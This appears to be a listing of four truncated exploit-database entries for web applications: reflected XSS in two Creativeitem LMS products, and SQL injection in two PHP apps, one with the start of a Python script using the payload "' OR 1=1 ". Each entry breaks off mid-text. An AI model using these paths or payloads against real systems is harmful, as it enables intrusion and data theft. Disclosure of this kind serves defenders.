# Exploit Title: Academy LMS 5.15 - Reflected XSS# Exploit Author: CraCkEr# Date: 09/07/2023# Vendor: Creativeitem# Vendor Homepage: https://creativeitem.com/# Software Link: https://demo.creativeitem.com/academy/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## DescriptionAllow Attacker to inject malicious code into website, give ability to steal sensitiveinformation, manipulate data, and launch additional attacks.Path: /home/coursesGET
# Exploit Title: Mastery LMS 1.2 - Reflected XSS# Exploit Author: CraCkEr# Date: 09/07/2023# Vendor: Creativeitem# Vendor Homepage: https://creativeitem.com/# Software Link: https://demo.creativeitem.com/mastery/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## DescriptionAllow Attacker to inject malicious code into website, give ability to steal sensitiveinformation, manipulate data, and launch additional attacks.Path: /browseGET
# Exploit Title: Lost and Found Information System v1.0 - SQL Injection# Date: 2023-06-30# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : webapps# Dork : /php-lfis/admin/?page=system info/contact information# Tested on: Windows/Linux# CVE : CVE-2023-33592import requests# URL of the vulnerable componenturl = "http://example.com/php-lfis/admin/?page=system info/contact information"# Injecting a SQL query to exploit the vulnerabilitypayload = "' OR 1=1 "# Send
# Exploit Title: Beauty Salon Management System v1.0 - SQLi# Date of found: 04/07/2023# Exploit Author: Fatih Nacar# Version: V1.0# Tested on: Windows 10# Vendor Homepage: https://www.campcodes.com # Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/# CWE: CWE-89Vulnerability Description -Beauty Salon Management System: V1.0, developed by Campcodes, has beenfound to be vulnerable to SQL Injection (SQLI) attacks. This vulnerabilityallows an